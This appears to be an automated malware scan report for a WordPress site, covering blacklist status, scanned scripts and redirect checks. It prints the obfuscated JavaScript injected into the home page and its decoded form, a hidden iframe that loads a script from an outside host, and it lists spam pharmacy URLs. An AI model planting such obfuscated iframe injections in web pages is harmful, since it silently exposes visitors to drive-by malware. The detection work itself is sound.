Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tofigrasulov.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://tofigrasulov.com/ | 200 OK Content-Length: 302062 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/147%v233%w241%p158%c202%i168%486% 134%r211%m210%b209%r214%e215%=95%082% 147%t237%l209%=95%w224%d216%h162%0107% 136%e206%g207%t174%082%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe> Antivirus reports:
| ||
http://tofigrasulov.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 10263 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/scylla.js?ver=3.8.1 | 200 OK Content-Length: 1273 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/other.js?ver=3.8.1 | 200 OK Content-Length: 17049 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/easyslider.js?ver=3.8.1 | 200 OK Content-Length: 6202 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/fancybox.js?ver=3.8.1 | 200 OK Content-Length: 15724 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js | 200 OK Content-Length: 994 Content-Type: application/javascript | clean |
http://tofigrasulov.com/?feed=rss2 | 200 OK Content-Length: 16588 Content-Type: text/xml | clean |
http://tofigrasulov.com/'http://1buycheapcialisonline.com/' | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://tofigrasulov.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://tofigrasulov.com/'http://buycialisonlinenowe.com/' | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tofigrasulov.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 03:52:23 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=az; expires=Tue, 23-Sep-2014 03:52:22 GMT; path=/
X-Pingback: http://tofigrasulov.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
GET / HTTP/1.1
Host: tofigrasulov.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 03:52:23 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=az; expires=Tue, 23-Sep-2014 03:52:22 GMT; path=/
X-Pingback: http://tofigrasulov.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: tofigrasulov.com
Referer: http://www.google.com/search?q=tofigrasulov.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tofigrasulov.com
Referer: http://www.google.com/search?q=tofigrasulov.com
Result:
The result is similar to the first query. There are no suspicious redirects found.